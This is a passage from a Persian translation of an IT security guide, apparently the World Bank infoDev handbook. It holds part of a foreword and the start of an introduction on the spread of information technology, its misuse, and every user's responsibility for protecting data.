ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻟﺰﻭﻣﹰﺎ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ infoDevﻳﺎ ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻨﻌﻜﺲ ﻧﻤﻲﻛﻨﺪ ،ﺑﻨﻈﺮ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻛﻨـﺎﺭ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻤﻚ ﺑﺰﺭﮔﻲ ﺑﻪ ﻓﻬﻢ ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻧﻤﺎﻳﺪ.
ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﻣﺘﺸﻜﻞ ﺍﺯ ﭘﻨﺞ ﺑﺨﺶ ﺍﺳﺖ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺟﺪﺍﮔﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﮔﻴـﺮﺩ .ﭘـﺲ ﺍﺯ ﻣﻘﺪﻣـﻪﺍﻱ
ﻛﻮﺗﺎﻩ ﺑﺮ ﻋﻨﺎﻭﻳﻦ ﻋﻤﻮﻣﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ،ﺑﻪ ﻣﻄﺎﻟﺐ ﻭ ﻣﺒﺎﺣﺜﻲ ﺑﺮﺧﻮﺭﺩ ﺧﻮﺍﻫﻴﺪﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ،ﺩﻭﻟﺖ ،ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ .ﻫﺮﭼﻨـﺪ ﺑﻴـﺸﺘﺮ ﭘﮋﻭﻫـﺸﻬﺎ ﻭ ﻣﻘـﺎﻻﺕ ﻣﻨﺘـﺸﺮ ﺷـﺪﻩ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﭘﻴﺪﺍ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺗﻼﺵ ﻣﺆﻟﻔﻴﻦ ﺑﺮ ﺍﻳﻦ ﺑﻮﺩﻩ ﻛﻪ ﺧﻂﻣﺸﻲﻫﺎﻱ ﻋﻤﻠﻲ ﻭ ﻛﺎﺭﺁﻣﺪﻱ ﺍﺭﺍﺋﻪ ﺩﻫﻨـﺪ ﻛـﻪ
ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ.
ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﺁﻏﺎﺯ ﺑﻜﺎﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺁﻥ ﻧﻘﻄﺔ ﺁﻏﺎﺯ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺗﻌـﺎﻣﻠﻲ ﺍﺯ ﭘﻴـﺸﺮﻓﺖ ﻫﻤﺰﻣـﺎﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ ﻓﻨـﺎﻭﺭﻱ
ﺑﺎﺷﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﻩ ﺁﻧﭽﻪ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻛﺘﺎﺏ ،ﺷﻴﻮﻩ ﻭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﻛﺎﺭﺁﻣﺪ ﺧﻮﺩ ﺭﺍ
ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
Mohesn A. Khalil
Burno Lanvin
Michel A.Maechler
:ﻣﺪﻳﺮ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ -ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ
:ﻣﺪﻳﺮ ﺑﺮﻧﺎﻣﺔ - infoDevﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ
:ﻣﺪﻳﺮ ﺗﻘﺴﻴﻢ ﻭﻇﺎﻳﻒ ﮔﺴﺘﺮﺵ ﺍﻃﻼﻋﺎﺕ ،ﻛﺎﺭﺷﻨﺎﺱ ﺍﺭﺷﺪ ﺍﻧﻔﻮﺭﻣﺎﺗﻴﻚ -ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ
infoDev Program of the World Bank Group
IT Security
infoDev Technical Advisory Panel
State Secretariat of Economic Affairs of Switzerland
Information & Communication Technology
1
2
3
4
5
ﭘﻴﺶﺩﺭﺁﻣﺪ
ﺳـﻴﺮ ﭘﻴـﺸﺮﻓﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﻧﻮﺁﻭﺭﻳﻬــﺎﻱ
ﺣﺎﺻﻞ ﺍﺯ ﺁﻥ ﻣﻮﺟﺐ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﺑﻬـﺮﻩﻭﺭﻱ ﻭ ﭘﻴـﺪﺍﻳﺶ
ﺍﻧــﻮﺍﻉ ﺟﺪﻳــﺪﻱ ﺍﺯ ﻛﺎﻻﻫــﺎ ﻭ ﺧــﺪﻣﺎﺕ ﺷــﺪﻩ ﺍﺳــﺖ .ﺑــﺎ ﺑﻬﺒــﻮﺩ
ﺭﻭﺯﺍﻓﺰﻭﻥ ﻗﺪﺭﺕ ،ﻇﺮﻓﻴﺖ ﻭ ﻗﻴﻤﺖ ﺗﺠﻬﻴﺰﺍﺕ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻛﻪ ﺑﻪ ﺭﺷﺪ ﺳﺎﻻﻧﺔ ﺗﻘﺮﻳﺒﹰﺎ ۳۰ﺩﺭﺻـﺪﻱ ﺑﻬـﺮﻩﻭﺭﻱ ﻧـﺴﺒﺖ ﺑـﻪ
ﻗﻴﻤﺖ ﻣﻨﺠﺮ ﺷﺪﻩ ،ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﻫﻤـﻪ
ﻣﻴﺴﺮ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻣﺮﻭﺯﻩ ﻣﺎ ﺩﺭ ﺩﻧﻴـﺎﻳﻲ ﺯﻧـﺪﮔﻲ ﻣـﻲﻛﻨـﻴﻢ ﻛـﻪ
ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺍﺭﺯﺍﻥ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺭﻭ
ﺑﻪ ﻛﺎﻫﺶ ﺍﺳﺖ ﻭ ﺟﻬﺎﻥ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺩﺭ ﺗﺒـﺎﺩﻝ ﻭ ﺗﻌﺎﻣـﻞ
ﻣﻲﺑﺎﺷﺪ.
ﺍﻣﺎ ﻓﺮﺍﻫﻢ ﺷـﺪﻥ ﺍﻣﻜﺎﻧـﺎﺕ ﻓﻨـﻲ ﺟﺪﻳـﺪ ﺗﻨﻬـﺎ ﺑﺎﻋـﺚ ﭘﻴـﺪﺍﻳﺶ
ﻣﺤﺼﻮﻻﺕ ﻧﻮﻳﻦ ﻭ ﺭﺍﻫﻬﺎﻱ ﺑﻬﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣـﻮﺭ
ﻧﺸﺪﻩ ،ﺑﻠﻜﻪ ﺩﺭ ﻛﻨﺎﺭ ﺁﻥ ﺍﻣﻜﺎﻥ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺭﺍ ﻧﻴـﺰ
ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳﺖ .ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴـﺰ ﻫﻤﺎﻧﻨـﺪ
ﺳﺎﻳﺮ ﻓﻨﺎﻭﺭﻳﻬﺎ ﺣﺎﻟﺖ ﺍﺑﺰﺍﺭﻱ ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﮕﺎﻥ ﻣﻔﻴﺪ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺑﻪ ﻧﺤـﻮﻱ ﺍﺯ
ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻛﻪ ﻧﺘﺎﻳﺞ ﺧﻄﺮﻧﺎﻛﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ .ﻋﺎﻣﻞ ﺳـﺮﻋﺖ
ﺩﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭼﻴﺰﻱ ﺩﺭ ﺣـﺪﻭﺩ ﻣﻴﻜﺮﻭﺛﺎﻧﻴـﻪ
ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﻗﺎﺑﻞ ﻣـﺸﺎﻫﺪﻩ ﺑـﺎ ﭼـﺸﻢ
ﻏﻴﺮﻣﺴﻠﺢ ،ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻬﻴﻪﺷﺪﻩ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩ ﺟﺎﺑﺠـﺎ
ﮔﺮﺩﺩ .ﺩﺭ ﭼﻨﻴﻦ ﻓﻀﺎﻳﻲ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺨﺮﺏ ﺁﻧﻘﺪﺭ ﺳﺮﻳﻊ
ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻏﻴﺮﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎﺷﺪ -ﻫﺮﭼﻨﺪ
ﺷﻨﺎﺳﺎﻳﻲ ﺁﻥ ﻏﻴﺮ ﻣﻤﻜﻦ ﻧﻴﺴﺖ.
ﻣﺸﻜﻼﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ،ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ
ﻭﺍﺑــﺴﺘﻪ ﺑــﻪ ﺁﻧﻬــﺎ ﻭ ﺫﺧﻴــﺮﻩ ﻭ ﺍﺭﺳــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺑــﻪ ﺷــﻜﻞ
ﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻣــﺴﺎﺋﻞ ﺗــﺎﺯﻩﺍﻱ ﻧﻴــﺴﺘﻨﺪ .ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺗﺠــﺎﺭ ﹺ
ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻧﺰﺩﻳﻚ ﺑﻪ ﭘﻨﺠـﺎﻩ ﺳـﺎﻝ ﻗـﺪﻣﺖ ﺩﺍﺭﻧـﺪ .ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﻧﻴﺰ ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭘﻮﻝ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣـﺎﻥ
ﺁﻏﺎﺯ ﻛﺮﺩﻩﺍﻧﺪ.
ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ،ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺍﺯ ﻃﺮﻳﻖ ﻧﻔـﻮﺫ
ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻟﻲ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﻗـﻮﻱ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺣﺘﻤـﺎﻝ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ
ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻗـﻮﻱﺗـﺮ ﺩﺭ ﻋﺮﺻـﺔ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﭘﺮﺩﺍﺯﺵ ،ﻃﺮﺣﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪﺍﻱ ﺍﻃﻼﻋﺎﺕ
ﺁﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩﺍﻧـﺪ .ﺍﻧﻘـﻼﺏ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ۷۰ﻣﻴﻼﺩﻱ ﺷﺮﻭﻉ ﺷـﺪ
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻮﺟﺐ ﺷﺪﻩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎ ﺍﻧﺪﺍﺯﻩ ﻭ ﻗـﺪﺭﺗﻲ ﻗﺎﺑـﻞ
ﻣﻼﺣﻈﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺻﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ.
ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻳﮕـﺮ ﺍﻧـﻮﺍﻉ ﺷـﺒﻜﻪﻫـﺎﻱ ﺷﺨـﺼﻲ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﻦ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﻣﻴـﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺮﺩﻡ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﺳﺎﺧﺘﻪﺍﻧﺪ .ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﺳﺎﻝ ﭘﻴﺶ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺍﻳـﻦ ﺭﺷـﺘﻪ
ﺻﻮﺭﺕ ﻣﻲ ﭘﺬﻳﺮﻓﺖ؛ ﺍﻣﺎ ﺍﻣـﺮﻭﺯﻩ ﺻـﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﺭﺍﻳﺎﻧـﻪ ﺑـﺮﺍﻱ
ﭘﺮﺩﺍﺯﺵ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺼﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﺗﻮﺳﻂ
ﻳﻚ ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻗﻮﻱ ﺑﻨﺎﻡ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ.
ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﻮﺟﺐ ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺮﺩﻣﻲ ﺍﺯ ﻃﺮﻳـﻖ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻣﻜﺎﻥ
ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﻭ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺑـﻪ ﻣﻔـﺎﻫﻴﻢ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺍﺳـﻨﺎﺩ
ﺗﺠﻬﻴﺰﺍﺕ ﻓﻨﻲ ﻭ ﻣﺤﺼﻮﻻﺕ ﺩﺭﺣـﺎﻝ ﺳـﺎﺧﺖ ﺭﺍ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻩ
ﺍﺳﺖ .ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺗﻨﺎﺳﺐ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻱ ،ﻣـﺸﻜﻼﺕ
ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ .ﻋﻤﺪﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻫﺔ ۷۰
ﻣﻴﻼﺩﻱ ﺭﺍ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺣﺮﻓﻪﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺗﺸﻜﻴﻞ ﻣﻲﺩﺍﺩﻧـﺪ؛ ﺣـﺎﻝ
ﺁﻧﻜﻪ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﻓﺮﺍﺩ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﻫـﺴﺘﻨﺪ ﻭ ﻟـﺬﺍ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺪﻡ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﻓﻲ ﺁﻧـﺎﻥ ﺑﺎﻋـﺚ ﺷـﻮﺩ ﻛـﻪ ﺍﺯ
ﺑﺴﺘﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳﺐ ﻧﻜﻨﻨـﺪ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﻣﺤـﻞ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ
ﺧﻮﺩ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺣﻤﻠﻪ ﻭ ﺍﺯ ﺁﻥ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﺎﻳﻨﺪ.
ﺍﮔﺮ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ
ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺑﺮ ﻋﻬـﺪﺓ ﺷـﻤﺎ ﺍﺳـﺖ .ﺍﻳـﻦ
ﻛﺘﺎﺏ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻭ ﻧﺤﻮﺓ ﻛﺎﺭﻛﺮﺩﻥ
ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳـﺎ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﻫـﻢ ﺭﺍ
ﺑﻴﺎﻣﻮﺯﻳﺪ .ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﻇﻴﻔﺔ ﻫﺮ ﻓﺮﺩ ﺍﺳـﺖ .ﺍﻳـﻦ
ﻓﺮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ،ﻛﺎﺭﺷﻨﺎﺱ ﻓﻨﻲ ،ﺭﺍﻫﺒﺮ ﺳﻴـﺴﺘﻢ،
ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ،ﻭ ﻣﺪﻳﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷـﺒﻜﻪ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﺪ.
ﺗﻮﺟﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺍﻗـﺪﺍﻣﺎﺕ ﺿـﺮﻭﺭﻱ ﻭ
ﺍﻃﻤﻴﻨﺎﻥﺑﺨﺸﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﺻـﻮﺭﺕ ﭘـﺬﻳﺮﺩ ﻭ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻤﻮﻋﻪﺍﻱ ﻣﺆﺛﺮ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﮔﺎﻡ ﻣﻬﻤـﻲ
ﺩﺭ ﺟﻬﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺳﺖ .ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﺩﺭ ﺑﻴـﺸﺘﺮ
١٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻳﻤـﻦ
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻭ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ
ﺩﺭ ﺷﺒﻜﻪ ﺑﺎ ﺳﺎﻳﺮﻳﻦ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻴﺪ.
(۴
(۵
ﺍﻳﻦ ﻛﺘﺎﺏ ﺯﻣﺎﻧﻲﺗﻬﻴﻪ ﺷﺪ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ -ﺍﺟﺘﻤﺎﻋﻲ ﺑـﻪ ﺍﻭﺝ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩ
ﺑﻮﺩ ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﻪ ﻣـﺪﺕ ۴۰ﺳـﺎﻝ ﻳـﺎ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻏﺎﻟـﺐ
ﻃﺮﺣﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﻳﺎ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳـﺎﻧﻲ
ﺩﻭﻣﻨﻈﻮﺭﻩ ﻳﺎ ﭼﻨﺪﻣﻨﻈﻮﺭﻩ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻓﺖ .ﺍﻳﻦ ﺑـﺎﻭﺭ
ﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻳﻚ ﻣﻮﺿﻮﻉ ﻣﻬـﻢ ﻭ ﺣﻴـﺎﺗﻲ
ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﺍﺳـﺖ ﻣﻮﺿـﻮﻋﻲ
ﻧﺴﺒﺘﹰﺎ ﺗﺎﺯﻩ ﻣﻲﺑﺎﺷﺪ ﻭ ﺷﺮﻭﻉ ﺁﻥ ﺑـﻪ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺒﻜﻪ ﺟﻬـﺎﻧﻲ
ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ۹۰ﻣﻴﻼﺩﻱ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ .ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ
